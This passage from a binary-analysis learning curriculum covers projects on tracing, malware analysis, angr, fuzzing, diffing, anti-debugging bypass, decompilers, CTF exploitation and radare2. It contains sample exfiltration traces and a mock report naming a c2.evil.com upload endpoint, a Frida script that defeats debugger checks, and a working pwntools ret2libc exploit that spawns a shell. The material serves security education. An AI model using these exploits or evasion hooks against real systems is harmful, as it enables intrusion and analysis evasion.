Difficulty: Beginner Time estimate: 3-5 days Prerequisites: Basic Linux command line

Real world outcome:

$ strace -f ./suspicious_binary 2>&1 | head -50
execve("./suspicious_binary", ...) = 0
openat(AT_FDCWD, "/etc/passwd", O_RDONLY) = 3   # Reading password file!
read(3, "root:x:0:0:...", 4096) = 2847
close(3)
socket(AF_INET, SOCK_STREAM, 0) = 4              # Opening socket!
connect(4, {sa_family=AF_INET, sin_port=htons(1337),
        sin_addr=inet_addr("10.0.0.1")}, 16) = 0  # Connecting to C2!
write(4, "root:x:0:0:...", 2847) = 2847          # Exfiltrating data!

$ ltrace ./crackme
__libc_start_main(...)
puts("Enter password: ")
fgets("test\n", 100, stdin)
strlen("test\n") = 5
strcmp("test", "s3cr3t_p4ss") = -1               # Password revealed!
puts("Wrong!")

Implementation Hints:

Useful strace options:

strace -f          # Follow child processes
strace -e open     # Only trace open() calls
strace -e file     # All file-related calls
strace -e network  # All network-related calls
strace -s 1000     # Show 1000 chars of strings
strace -o log.txt  # Output to file
strace -p PID      # Attach to running process

Useful ltrace options:

ltrace -e strcmp   # Only trace strcmp
ltrace -e '*'      # All library calls
ltrace -C          # Demangle C++ names
ltrace -n 2        # Show 2 levels of nesting

Analysis workflow:

  1. Run with strace to see syscalls
  2. Run with ltrace to see library calls
  3. Look for interesting patterns:
    • File operations (what does it read/write?)
    • Network operations (where does it connect?)
    • String comparisons (password checks?)

Learning milestones:

  1. Trace basic program → Understand output format
  2. Find password checks → strcmp/memcmp in ltrace
  3. Trace network activity → socket/connect/send
  4. Analyze malware behavior → Without disassembly

Project 10: Malware Analysis Lab

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: Assembly analysis, Python
  • Alternative Programming Languages: PowerShell (Windows malware)
  • Coolness Level: Level 5: Pure Magic (Super Cool)
  • Business Potential: 3. The “Service & Support” Model
  • Difficulty: Level 3: Advanced
  • Knowledge Area: Malware Analysis / Threat Intelligence
  • Software or Tool: REMnux, FLARE-VM, Ghidra, x64dbg
  • Main Book: “Practical Malware Analysis” by Sikorski & Honig

What you’ll build: A complete malware analysis workflow, from safe environment setup to behavioral analysis, static analysis, and report writing.

Why it teaches binary analysis: Malware analysis is one of the most practical applications of binary analysis. It combines all skills: file formats, assembly, debugging, and behavioral analysis.

Core challenges you’ll face:

  • Safe environment → maps to VMs, network isolation
  • Behavioral analysis → maps to what does it do when run?
  • Static analysis → maps to understanding without running
  • Anti-analysis bypass → maps to detecting/evading protections

Resources for key challenges:

Key Concepts:

  • Safe Environment Setup: “Practical Malware Analysis” Ch. 2
  • Behavioral Analysis: “Practical Malware Analysis” Ch. 3
  • Anti-Debugging Techniques: OpenRCE Database

Difficulty: Advanced Time estimate: 4-6 weeks Prerequisites: Projects 1-9, strong Windows/Linux knowledge

Real world outcome:

# Malware Analysis Report: suspicious.exe

## Executive Summary
The sample is a credential stealer that exfiltrates browser passwords
to a C2 server at 192.168.1.100:443.

## Static Analysis
- File Type: PE32+ executable (x64)
- Compiler: MSVC 2019
- Imports: WinInet (HTTP), Crypt32 (decryption), Advapi32 (registry)
- Packed: UPX 3.96 (unpacked for analysis)
- Strings:
  - "Chrome\\User Data\\Default\\Login Data"
  - "Mozilla\\Firefox\\Profiles"
  - "https://c2.evil.com/upload"

## Behavioral Analysis
1. Creates mutex "Global\\{GUID}" (prevents multiple instances)
2. Achieves persistence via Run key
3. Reads browser credential databases
4. Encrypts data with XOR key 0x37
5. Exfiltrates via HTTPS POST

## IOCs
- Mutex: Global\\{12345678-1234-...}
- C2: 192.168.1.100:443
- User-Agent: "Mozilla/5.0 Custom"
- File: %APPDATA%\\svchost.exe

## YARA Rule
rule credential_stealer {
    strings:
        $s1 = "Login Data" ascii
        $s2 = "cookies.sqlite" ascii
        $c2 = "192.168.1.100" ascii
    condition:
        2 of them
}

Implementation Hints:

Analysis workflow:

  1. Triage: File type, hashes, VirusTotal check
  2. Environment Setup: Isolated VM with snapshots
  3. Behavioral Analysis:
    • Process Monitor (Windows) / strace (Linux)
    • Network capture (Wireshark, fakenet-ng)
    • Registry changes, file system changes
  4. Static Analysis:
    • Strings, imports, exports
    • Unpack if packed
    • Disassemble/decompile key functions
  5. Dynamic Analysis:
    • Debug with x64dbg/GDB
    • Set breakpoints on interesting APIs
    • Dump decrypted data
  6. Report Writing: Document findings with IOCs

Anti-analysis techniques to watch for:

  • IsDebuggerPresent() checks
  • Timing checks (RDTSC)
  • VM detection (CPUID, registry checks)
  • Anti-disassembly tricks

Learning milestones:

  1. Set up safe lab → Isolated analysis environment
  2. Behavioral analysis → Understand without disassembly
  3. Static analysis → Reverse engineer core functionality
  4. Write reports → Document findings professionally

Project 11: Symbolic Execution with angr

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: Python
  • Alternative Programming Languages: None (angr is Python-only)
  • Coolness Level: Level 5: Pure Magic (Super Cool)
  • Business Potential: 1. The “Resume Gold”
  • Difficulty: Level 4: Expert
  • Knowledge Area: Program Analysis / Constraint Solving
  • Software or Tool: angr framework, Python 3
  • Main Book: angr documentation

What you’ll build: Use symbolic execution to automatically find inputs that reach specific program states, solving CTF challenges and finding bugs.

Why it teaches binary analysis: Symbolic execution represents the frontier of automated program analysis. It finds paths humans might miss.

Core challenges you’ll face:

  • Setting up states → maps to defining where to start
  • Avoiding path explosion → maps to constraining exploration
  • Finding target addresses → maps to what state do you want?
  • Extracting solutions → maps to getting concrete inputs

Resources for key challenges:

Key Concepts:

  • Symbolic State: angr docs - Core Concepts
  • Exploration Techniques: angr docs - Simulation
  • Constraint Solving: Z3 solver basics

Difficulty: Expert Time estimate: 2-3 weeks Prerequisites: Projects 1-8, Python proficiency

Real world outcome:

import angr
import claripy

# Load binary
proj = angr.Project('./crackme', auto_load_libs=False)

# Create symbolic input (32 bytes)
password = claripy.BVS('password', 32 * 8)

# Create initial state at entry point
state = proj.factory.entry_state(
    args=['./crackme'],
    stdin=angr.SimFile('/dev/stdin', content=password)
)

# Create simulation manager
simgr = proj.factory.simulation_manager(state)

# Explore: find 'success', avoid 'failure'
simgr.explore(
    find=lambda s: b"Correct" in s.posix.dumps(1),
    avoid=lambda s: b"Wrong" in s.posix.dumps(1)
)

# Extract solution
if simgr.found:
    solution = simgr.found[0].solver.eval(password, cast_to=bytes)
    print(f"Password: {solution.decode()}")
else:
    print("No solution found")

# Output:
# Password: sup3r_s3cr3t_k3y

Implementation Hints:

angr workflow:

  1. Load binary with angr.Project()
  2. Create symbolic variables with claripy.BVS()
  3. Create initial state with factory.entry_state()
  4. Create simulation manager with factory.simulation_manager()
  5. Explore with simgr.explore(find=..., avoid=...)
  6. Extract solution with solver.eval()

Tips for avoiding path explosion:

  • Use avoid to skip irrelevant paths
  • Set memory limits on states
  • Use hooks to skip complex functions
  • Start exploration from specific addresses

Common patterns:

# Find by address
simgr.explore(find=0x401234, avoid=0x401111)

# Find by output string
simgr.explore(
    find=lambda s: b"WIN" in s.posix.dumps(1),
    avoid=lambda s: b"LOSE" in s.posix.dumps(1)
)

# Hook a function
@proj.hook(0x401000, length=5)
def skip_check(state):
    state.regs.eax = 1  # Always succeed

Learning milestones:

  1. Solve simple crackme → Basic symbolic execution
  2. Handle complex inputs → Symbolic arrays
  3. Use hooks → Skip annoying functions
  4. Solve CTF challenges → Real-world application

Project 12: Fuzzing with AFL++

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: C (for harnesses), Shell
  • Alternative Programming Languages: Python (for orchestration)
  • Coolness Level: Level 4: Hardcore Tech Flex
  • Business Potential: 3. The “Service & Support” Model
  • Difficulty: Level 3: Advanced
  • Knowledge Area: Vulnerability Discovery / Fuzzing
  • Software or Tool: AFL++, libFuzzer, Address Sanitizer
  • Main Book: “The Fuzzing Book” (online)

What you’ll build: Fuzzing campaigns that automatically discover crashes and vulnerabilities in binary programs.

Why it teaches binary analysis: Fuzzing is how most modern vulnerabilities are found. Understanding fuzzing means understanding what makes programs crash.

Core challenges you’ll face:

  • Writing harnesses → maps to calling the target function
  • Preparing corpus → maps to good starting inputs
  • Triaging crashes → maps to which crashes are exploitable?
  • Binary-only fuzzing → maps to QEMU mode, Frida

Resources for key challenges:

Key Concepts:

  • Coverage-Guided Fuzzing: AFL++ docs
  • Sanitizers: LLVM sanitizer docs
  • Persistent Mode: AFL++ performance docs

Difficulty: Advanced Time estimate: 2-3 weeks Prerequisites: C programming, Projects 1-3

Real world outcome:

# Compile target with instrumentation
$ afl-gcc -o target target.c

# Prepare input corpus
$ mkdir in out
$ echo "test" > in/seed1

# Start fuzzing
$ afl-fuzz -i in -o out ./target @@

# AFL++ output:
#        american fuzzy lop ++4.00c
# ┌─ process timing ─────────────────────────────────────┐
# │        run time : 0 days, 0 hrs, 23 min, 45 sec      │
# │   last new find : 0 days, 0 hrs, 0 min, 12 sec       │
# ├─ overall results ────────────────────────────────────┤
# │  cycles done : 847                                   │
# │ corpus count : 234                                   │
# │saved crashes : 3 (!)                                 │   ← Found bugs!
# │  saved hangs : 0                                     │
# └──────────────────────────────────────────────────────┘

# Triage crashes
$ for crash in out/crashes/*; do
    ./target "$crash" 2>&1 | head -5
done

Implementation Hints:

Writing a harness:

// For AFL++
int main(int argc, char **argv) {
    if (argc < 2) return 1;

    FILE *f = fopen(argv[1], "r");
    if (!f) return 1;

    char buf[1024];
    size_t len = fread(buf, 1, sizeof(buf), f);
    fclose(f);

    // Call the function we want to fuzz
    parse_input(buf, len);
    return 0;
}

// For libFuzzer
extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {
    parse_input((char*)data, size);
    return 0;
}

AFL++ modes:

  • Source mode: Compile with afl-gcc/afl-clang-fast
  • QEMU mode: Fuzz binaries without source (-Q flag)
  • Frida mode: Alternative for binary-only
  • Persistent mode: Faster fuzzing with loop

Sanitizers (compile with these for better crash detection):

# Address Sanitizer (memory bugs)
clang -fsanitize=address,fuzzer target.c

# Undefined Behavior Sanitizer
clang -fsanitize=undefined,fuzzer target.c

Learning milestones:

  1. Fuzz simple target → Find obvious crashes
  2. Write custom harness → Fuzz specific functions
  3. Triage crashes → Determine exploitability
  4. Fuzz binary-only → No source code available

Project 13: Binary Diffing

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: Python
  • Alternative Programming Languages: Ghidra scripts
  • Coolness Level: Level 3: Genuinely Clever
  • Business Potential: 2. The “Micro-SaaS / Pro Tool”
  • Difficulty: Level 2: Intermediate
  • Knowledge Area: Patch Analysis / Vulnerability Research
  • Software or Tool: BinDiff, Diaphora, Ghidriff
  • Main Book: N/A (tool documentation)

What you’ll build: Compare two versions of a binary to find what changed, useful for understanding patches and finding 1-day vulnerabilities.

Why it teaches binary analysis: Comparing old and new versions reveals exactly what was fixed, helping you understand vulnerabilities.

Core challenges you’ll face:

  • Function matching → maps to identifying same function across versions
  • Diffing algorithms → maps to graph-based comparison
  • Finding security patches → maps to what was the vulnerability?
  • Interpreting results → maps to understanding the change

Resources for key challenges:

Key Concepts:

  • Function Matching: BinDiff documentation
  • Graph Isomorphism: Comparison algorithms
  • Patch Tuesday Analysis: Security research blogs

Difficulty: Intermediate Time estimate: 1-2 weeks Prerequisites: Project 5 (Ghidra)

Real world outcome:

# Using ghidriff
$ ghidriff libpng-1.6.39.so libpng-1.6.40.so -o diff_report

# Output:
# Modified Functions:
#   png_read_IDAT_data (similarity: 0.87)
#     - Added bounds check at 0x1234
#     - New comparison: if (length > max_size)
#
#   png_handle_chunk (similarity: 0.95)
#     - Additional validation in switch statement
#
# New Functions:
#   png_check_chunk_length
#
# Deleted Functions:
#   (none)

# Analysis:
# The patch adds a bounds check in png_read_IDAT_data
# This fixes CVE-2023-XXXX (buffer overflow)
# Vulnerable code: memcpy without size check
# Fixed code: size validated before copy

Implementation Hints:

Binary diffing workflow:

  1. Get old and new versions of binary
  2. Export to BinDiff/Diaphora format
  3. Run the diffing tool
  4. Focus on:
    • Modified functions with low similarity
    • New validation/bounds check functions
    • Changes near memory operations

Tools:

  • BinDiff: Best for IDA Pro users
  • Diaphora: Open source, works with IDA
  • Ghidriff: Works with Ghidra, command-line
  • Ghidra Version Tracking: Built-in

Identifying security patches:

  • Look for new if statements (validation)
  • Look for changes to buffer operations
  • Look for new error handling
  • Check functions near strings like “overflow”, “bounds”

Learning milestones:

  1. Diff two versions → Generate comparison report
  2. Identify changed functions → Focus on modifications
  3. Find security patches → Understand what was fixed
  4. Recreate vulnerability → Test on old version

Project 14: Anti-Debugging Bypass

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: Assembly, C, Python
  • Alternative Programming Languages: Frida scripts
  • Coolness Level: Level 4: Hardcore Tech Flex
  • Business Potential: 1. The “Resume Gold”
  • Difficulty: Level 3: Advanced
  • Knowledge Area: Anti-Analysis / Evasion
  • Software or Tool: x64dbg, GDB, Frida
  • Main Book: “The Art of Mac Malware” by Patrick Wardle

What you’ll build: Techniques to detect and bypass anti-debugging, anti-VM, and anti-analysis protections.

Why it teaches binary analysis: Real-world malware and protected software use these tricks. Knowing how to bypass them is essential.

Core challenges you’ll face:

  • Detecting debuggers → maps to IsDebuggerPresent, ptrace, etc.
  • Timing checks → maps to RDTSC, GetTickCount
  • VM detection → maps to CPUID, registry checks
  • Anti-disassembly → maps to opaque predicates, junk bytes

Resources for key challenges:

Key Concepts:

  • Windows Anti-Debugging: NtQueryInformationProcess, PEB flags
  • Linux Anti-Debugging: ptrace, /proc/self/status
  • Timing Attacks: RDTSC, clock differences

Difficulty: Advanced Time estimate: 2-3 weeks Prerequisites: Projects 4-7, debugger proficiency

Real world outcome:

# Frida script to bypass anti-debugging

import frida

jscode = """
// Bypass IsDebuggerPresent
Interceptor.replace(
    Module.getExportByName('kernel32.dll', 'IsDebuggerPresent'),
    new NativeCallback(function() {
        console.log('[*] IsDebuggerPresent called - returning false');
        return 0;
    }, 'int', [])
);

// Bypass NtQueryInformationProcess (ProcessDebugPort)
Interceptor.attach(
    Module.getExportByName('ntdll.dll', 'NtQueryInformationProcess'),
    {
        onEnter: function(args) {
            this.processInfoClass = args[1].toInt32();
            this.buffer = args[2];
        },
        onLeave: function(retval) {
            if (this.processInfoClass === 7) {  // ProcessDebugPort
                console.log('[*] ProcessDebugPort check bypassed');
                this.buffer.writeU64(0);
            }
        }
    }
);

// Bypass timing checks by hooking GetTickCount
var originalGetTickCount = Module.getExportByName('kernel32.dll', 'GetTickCount');
var lastTick = 0;
Interceptor.replace(originalGetTickCount,
    new NativeCallback(function() {
        lastTick += 100;  // Always return consistent timing
        return lastTick;
    }, 'uint', [])
);

console.log('[*] Anti-debugging bypasses installed');
"""

device = frida.get_local_device()
pid = device.spawn(['./protected.exe'])
session = device.attach(pid)
script = session.create_script(jscode)
script.load()
device.resume(pid)

Implementation Hints:

Common anti-debugging techniques:

Windows:

// Technique 1: IsDebuggerPresent
if (IsDebuggerPresent()) exit(1);

// Technique 2: PEB.BeingDebugged flag
PPEB peb = (PPEB)__readgsqword(0x60);
if (peb->BeingDebugged) exit(1);

// Technique 3: NtQueryInformationProcess
DWORD debugPort;
NtQueryInformationProcess(GetCurrentProcess(),
    ProcessDebugPort, &debugPort, sizeof(debugPort), NULL);
if (debugPort != 0) exit(1);

// Technique 4: Timing check
DWORD start = GetTickCount();
// ... code ...
DWORD end = GetTickCount();
if (end - start > 100) exit(1);  // Too slow = debugger

Linux:

// Technique 1: ptrace self-attach
if (ptrace(PTRACE_TRACEME, 0, 0, 0) == -1) exit(1);

// Technique 2: Check /proc/self/status
FILE *f = fopen("/proc/self/status", "r");
// Look for TracerPid: non-zero = debugged

Bypass approaches:

  1. Patch the check: NOP out the comparison
  2. Hook the API: Return false from IsDebuggerPresent
  3. Modify environment: Clear PEB flag
  4. Use stealth debugger: ScyllaHide, TitanHide

Learning milestones:

  1. Identify techniques → Recognize anti-debugging code
  2. Static bypass → Patch checks in binary
  3. Dynamic bypass → Use hooks/plugins
  4. Write bypasses → Create reusable scripts

Project 15: Build a Decompiler

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: Python
  • Alternative Programming Languages: C++, Rust
  • Coolness Level: Level 5: Pure Magic (Super Cool)
  • Business Potential: 4. The “Open Core” Infrastructure
  • Difficulty: Level 5: Master
  • Knowledge Area: Program Analysis / Code Generation
  • Software or Tool: Your disassembler, LLVM (optional)
  • Main Book: “Compilers: Principles, Techniques, and Tools” (Dragon Book)

What you’ll build: A decompiler that converts assembly/IR back into readable C-like pseudocode.

Why it teaches binary analysis: Decompilation is the ultimate reverse engineering skill. Building one means understanding control flow, data flow, and type recovery.

Core challenges you’ll face:

  • Control flow recovery → maps to if/else, loops from jumps
  • Data flow analysis → maps to variable identification
  • Type inference → maps to int vs pointer vs struct
  • Code generation → maps to producing readable output

Resources for key challenges:

Key Concepts:

  • Control Flow Graphs: “Engineering a Compiler” Ch. 8
  • SSA Form: “Engineering a Compiler” Ch. 9
  • Type Recovery: Academic papers on type inference

Difficulty: Master Time estimate: 2-3 months Prerequisites: All previous projects, compiler theory

Real world outcome:

Input (disassembly):
    push    rbp
    mov     rbp, rsp
    sub     rsp, 0x20
    mov     [rbp-0x14], edi
    mov     [rbp-0x20], rsi
    cmp     [rbp-0x14], 1
    jle     .fail
    mov     rax, [rbp-0x20]
    mov     rdi, [rax+8]
    call    atoi
    cmp     eax, 0x539
    jne     .fail
    lea     rdi, [success_msg]
    call    puts
    jmp     .end
.fail:
    lea     rdi, [fail_msg]
    call    puts
.end:
    xor     eax, eax
    leave
    ret

Output (decompiled):
    int main(int argc, char **argv) {
        int input;

        if (argc <= 1) {
            puts("Wrong!");
            return 0;
        }

        input = atoi(argv[1]);

        if (input != 1337) {
            puts("Wrong!");
            return 0;
        }

        puts("Correct!");
        return 0;
    }

Implementation Hints:

Decompilation phases:

  1. Disassembly: Convert bytes to instructions
  2. Control Flow Graph: Build graph of basic blocks
  3. Data Flow Analysis: Track value flow through registers
  4. Type Analysis: Infer types from usage
  5. Control Flow Structuring: Convert jumps to if/while
  6. Code Generation: Output C-like code

Control flow structuring algorithms:

  • If-then-else: Look for diamond patterns
  • While loops: Back edges in CFG
  • For loops: Canonical form with counter

Questions to consider:

  • How do you detect loop vs if-else?
  • How do you recover variable names?
  • How do you handle optimized code?
  • How do you represent structs?

Start simple:

  1. Handle single-block functions
  2. Add if-else handling
  3. Add while loop detection
  4. Add function call recovery
  5. Add type inference

Learning milestones:

  1. Build CFG from assembly → Basic blocks and edges
  2. Detect if-else → Diamond pattern recognition
  3. Detect loops → Back edge identification
  4. Generate readable code → Produce C-like output

Project 16: CTF Binary Exploitation Practice

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: Python (pwntools)
  • Alternative Programming Languages: Shell scripting
  • Coolness Level: Level 5: Pure Magic (Super Cool)
  • Business Potential: 1. The “Resume Gold”
  • Difficulty: Level 3: Advanced
  • Knowledge Area: CTF / Competitive Hacking
  • Software or Tool: pwntools, Docker, CTF platforms
  • Main Book: “CTF Field Guide” (Trail of Bits)

What you’ll build: Solve 20+ CTF pwn challenges from various difficulty levels, building a personal exploit template library.

Why it teaches binary analysis: CTF challenges are designed to teach specific concepts. They provide immediate feedback and gamified learning.

Core challenges you’ll face:

  • Various vulnerability types → maps to stack, heap, format string
  • Different protections → maps to ASLR, NX, canary, PIE
  • Time pressure → maps to efficient analysis workflow
  • Novel techniques → maps to learning new tricks

Resources for key challenges:

Key Concepts:

  • Challenge Categories: CTF101.org
  • Exploit Primitives: “The Shellcoder’s Handbook”
  • Advanced Techniques: CTF writeups

Difficulty: Advanced Time estimate: Ongoing (2+ months) Prerequisites: Projects 7-8 (Buffer Overflow, ROP)

Real world outcome:

# Exploit template
from pwn import *

# Configuration
binary = './challenge'
libc = './libc.so.6' if args.REMOTE else '/lib/x86_64-linux-gnu/libc.so.6'
host, port = 'challenge.ctf.com', 1337

# Setup
elf = context.binary = ELF(binary)
libc = ELF(libc)

def conn():
    if args.REMOTE:
        return remote(host, port)
    elif args.GDB:
        return gdb.debug(binary, '''
            break main
            continue
        ''')
    else:
        return process(binary)

# Gadgets
rop = ROP(elf)
pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0]
ret = rop.find_gadget(['ret'])[0]

# Exploit
def exploit():
    p = conn()

    # Stage 1: Leak libc
    payload = flat({
        0x48: pop_rdi,
        0x50: elf.got['puts'],
        0x58: elf.plt['puts'],
        0x60: elf.symbols['main']
    })

    p.sendlineafter(b'> ', payload)
    leak = u64(p.recvline().strip().ljust(8, b'\x00'))
    libc.address = leak - libc.symbols['puts']
    log.success(f'libc base: {hex(libc.address)}')

    # Stage 2: Shell
    payload = flat({
        0x48: ret,
        0x50: pop_rdi,
        0x58: next(libc.search(b'/bin/sh')),
        0x60: libc.symbols['system']
    })

    p.sendlineafter(b'> ', payload)
    p.interactive()

if __name__ == '__main__':
    exploit()

Implementation Hints:

Progression path:

  1. Stack challenges: Buffer overflow, ret2win
  2. ROP challenges: ret2libc, ROP chains
  3. Format string: Read/write primitives
  4. Heap challenges: Use-after-free, heap overflow
  5. Advanced: House of Force, tcache poisoning

Build your template library:

  • leak_libc.py - Standard libc leak pattern
  • rop_chain.py - ROP chain builder
  • format_string.py - Format string exploit
  • heap_exploit.py - Heap exploitation patterns

Practice platforms:

  • pwnable.kr (beginner-friendly)
  • ROP Emporium (ROP-focused)
  • pwnable.tw (advanced)
  • picoCTF (beginner)

Learning milestones:

  1. Solve 10 stack challenges → Master buffer overflows
  2. Solve 5 ROP challenges → Bypass NX
  3. Solve 5 format string → Arbitrary read/write
  4. Attempt heap challenges → Enter advanced territory

Project 17: radare2 Mastery

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: r2 commands, r2pipe (Python)
  • Alternative Programming Languages: JavaScript (r2js)
  • Coolness Level: Level 4: Hardcore Tech Flex
  • Business Potential: 1. The “Resume Gold”
  • Difficulty: Level 2: Intermediate
  • Knowledge Area: Static Analysis / Command Line RE
  • Software or Tool: radare2, Cutter (GUI)
  • Main Book: “The radare2 Book”

What you’ll build: Complete analysis of binaries using only radare2’s command-line interface, plus automation with r2pipe.

Why it teaches binary analysis: radare2 is the most powerful open-source RE framework. Its CLI forces you to think about what you’re doing.

Core challenges you’ll face:

  • Command syntax → maps to steep learning curve
  • Navigation → maps to moving through binaries
  • Visual mode → maps to interactive disassembly
  • Scripting → maps to r2pipe automation

Resources for key challenges:

Key Concepts:

  • Command Structure: radare2 book
  • Visual Mode: V and VV commands
  • r2pipe: Python bindings documentation

Difficulty: Intermediate Time estimate: 2-3 weeks Prerequisites: Projects 1-4

Real world outcome:

$ r2 ./crackme
[0x00401040]> aaa               # Analyze all
[0x00401040]> afl               # List functions
0x00401040    1 43           entry0
0x00401170    4 101          main
0x004011e0    3 67           sym.check_password

[0x00401040]> s main            # Seek to main
[0x00401170]> pdf               # Print disassembly function
            ; CODE XREF from entry0
┌ 101: int main (int argc, char **argv);
│           0x00401170      push rbp
│           0x00401171      mov rbp, rsp
│           0x00401174      sub rsp, 0x40
│           ...
│           0x004011a0      call sym.check_password
│       ┌─< 0x004011a5      test eax, eax
│       │   0x004011a7      je 0x4011b8
│       │   0x004011a9      lea rdi, str.Correct
│       │   0x004011b0      call sym.imp.puts

[0x00401170]> VV                # Visual graph mode
[0x00401170]> s sym.check_password
[0x004011e0]> pdc               # Decompile (with r2ghidra)

int check_password(char *input) {
    return strcmp(input, "s3cr3t") == 0;
}

# r2pipe automation
$ python3
>>> import r2pipe
>>> r2 = r2pipe.open('./crackme')
>>> r2.cmd('aaa')
>>> functions = r2.cmdj('aflj')  # JSON output
>>> for f in functions:
...     print(f['name'], hex(f['offset']))

Implementation Hints:

Essential r2 commands:

# Analysis
aaa              # Analyze all
afl              # List functions
axt addr         # Xrefs to address
axf addr         # Xrefs from address
iz               # List strings
ii               # List imports

# Navigation
s addr           # Seek to address
s main           # Seek to function
sf               # Seek to next function
sb               # Seek to previous function

# Disassembly
pd 20            # Print 20 instructions
pdf              # Print function disassembly
pdc              # Pseudo-decompile (with plugins)
pdr              # Print function in raw bytes

# Visual mode
V                # Visual mode (press p to cycle views)
VV               # Visual graph mode
Vp               # Visual panel mode

# Debugging
db addr          # Set breakpoint
dc               # Continue
ds               # Step
dr               # Show registers
doo              # Reopen for debugging

# Patching
wa nop           # Write assembly (nop)
wx 90            # Write hex bytes

Common workflows:

  1. aaa; afl - Analyze and list functions
  2. iz; iz~password - Find interesting strings
  3. axt str.password - Find references to string
  4. s ref; pdf - Go to reference, disassemble

Learning milestones:

  1. Basic navigation → Move around binaries
  2. Visual mode → Efficient analysis
  3. Find vulnerabilities → Locate interesting code
  4. Automate with r2pipe → Script your analysis

Project 18: Complete Binary Analysis Toolkit

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: Python
  • Alternative Programming Languages: Rust, C
  • Coolness Level: Level 5: Pure Magic (Super Cool)
  • Business Potential: 4. The “Open Core” Infrastructure
  • Difficulty: Level 5: Master
  • Knowledge Area: Tool Development / Complete Framework
  • Software or Tool: Your previous projects
  • Main Book: All previous books

What you’ll build: A unified toolkit combining your ELF/PE parser, disassembler, analyzer, and exploit helpers into one professional tool.

Why it teaches binary analysis: Building professional tools requires integrating all your knowledge into a cohesive system.

Core challenges you’ll face:

  • Clean architecture → maps to modular, extensible design
  • User experience → maps to helpful output, good CLI
  • Integration → maps to combining all components
  • Documentation → maps to making it usable

Time estimate: 2-3 months Prerequisites: All previous projects

Real world outcome:

$ binkit analyze ./suspicious
╔══════════════════════════════════════════════════════════════╗
║                    Binary Analysis Report                     ║
╠══════════════════════════════════════════════════════════════╣
║ File:     suspicious                                          ║
║ Format:   ELF64                                               ║
║ Arch:     x86-64                                              ║
║ Compiler: GCC 11.2.0                                          ║
╠══════════════════════════════════════════════════════════════╣
║                       Security                                ║
╠══════════════════════════════════════════════════════════════╣
║ RELRO:        Full RELRO     ✓                               ║
║ Stack Canary: Found          ✓                               ║
║ NX:           Enabled        ✓                               ║
║ PIE:          Enabled        ✓                               ║
║ Fortify:      Enabled        ✓                               ║
╠══════════════════════════════════════════════════════════════╣
║                    Vulnerabilities                            ║
╠══════════════════════════════════════════════════════════════╣
║ ⚠ gets() called at 0x401234 - Buffer overflow risk           ║
║ ⚠ strcpy() called at 0x401456 - No bounds checking           ║
║ ⚠ Format string at 0x401567 - printf(user_input)             ║
╠══════════════════════════════════════════════════════════════╣
║                    Interesting Strings                        ║
╠══════════════════════════════════════════════════════════════╣
║ 0x402000: "/bin/sh"                                           ║
║ 0x402008: "http://c2.evil.com"                                ║
║ 0x402020: "password123"                                       ║
╠══════════════════════════════════════════════════════════════╣
║                      Exploit Template                         ║
╠══════════════════════════════════════════════════════════════╣
║ Generated: exploit_suspicious.py                              ║
║ Target: gets() overflow at 0x401234                          ║
║ Strategy: ROP chain to system("/bin/sh")                     ║
╚══════════════════════════════════════════════════════════════╝

$ binkit disasm 0x401234 20
0x00401234: 48 89 e7              mov rdi, rsp
0x00401237: e8 c4 fe ff ff        call 0x401100 <gets@plt>
0x0040123c: 48 85 c0              test rax, rax
...

$ binkit exploit ./suspicious --output pwn.py
[*] Generating exploit template...
[*] Found gets() vulnerability at 0x401234
[*] ROP gadgets found: 15
[*] Exploit written to pwn.py
[*] Run with: python3 pwn.py

Implementation Hints:

Architecture:

binkit/
├── core/
│   ├── parser.py      # ELF/PE parsing (Project 1-2)
│   ├── disasm.py      # Disassembly (Project 3)
│   └── analyzer.py    # Vulnerability detection
├── exploit/
│   ├── rop.py         # ROP chain builder
│   ├── shellcode.py   # Shellcode generation
│   └── templates/     # Exploit templates
├── output/
│   ├── console.py     # Pretty printing
│   └── report.py      # Report generation
└── cli.py             # Command-line interface

Features to implement:

  1. Auto-detect file format
  2. Security check (like checksec)
  3. Vulnerability scanning
  4. ROP gadget finder
  5. Exploit template generator
  6. Report generation

Learning milestones:

  1. Integrate parsers → Support ELF and PE
  2. Add analysis → Vulnerability detection
  3. Build CLI → User-friendly interface
  4. Generate exploits → Automated template creation

Project Comparison Table

# Project Difficulty Time Key Skill Fun
1 ELF Parser ⭐⭐ 1-2 weeks File Formats ⭐⭐⭐
2 PE Parser ⭐⭐ 1-2 weeks Windows Formats ⭐⭐⭐
3 Disassembler ⭐⭐⭐ 2-4 weeks Instruction Encoding ⭐⭐⭐⭐
4 GDB Deep Dive ⭐⭐ 1-2 weeks Debugging ⭐⭐⭐⭐
5 Ghidra RE ⭐⭐ 2-3 weeks Static Analysis ⭐⭐⭐⭐
6 Crackmes ⭐⭐ 2-4 weeks Reverse Engineering ⭐⭐⭐⭐⭐
7 Buffer Overflow ⭐⭐⭐ 3-4 weeks Exploitation ⭐⭐⭐⭐⭐
8 ROP Chains ⭐⭐⭐⭐ 2-3 weeks Advanced Exploitation ⭐⭐⭐⭐⭐
9 strace/ltrace 3-5 days Dynamic Analysis ⭐⭐⭐
10 Malware Lab ⭐⭐⭐ 4-6 weeks Malware Analysis ⭐⭐⭐⭐⭐
11 angr ⭐⭐⭐⭐ 2-3 weeks Symbolic Execution ⭐⭐⭐⭐
12 Fuzzing ⭐⭐⭐ 2-3 weeks Vulnerability Discovery ⭐⭐⭐⭐
13 Binary Diffing ⭐⭐ 1-2 weeks Patch Analysis ⭐⭐⭐
14 Anti-Debug Bypass ⭐⭐⭐ 2-3 weeks Anti-Analysis ⭐⭐⭐⭐
15 Decompiler ⭐⭐⭐⭐⭐ 2-3 months Code Recovery ⭐⭐⭐⭐
16 CTF Practice ⭐⭐⭐ Ongoing Competition Skills ⭐⭐⭐⭐⭐
17 radare2 Mastery ⭐⭐ 2-3 weeks CLI Tools ⭐⭐⭐⭐
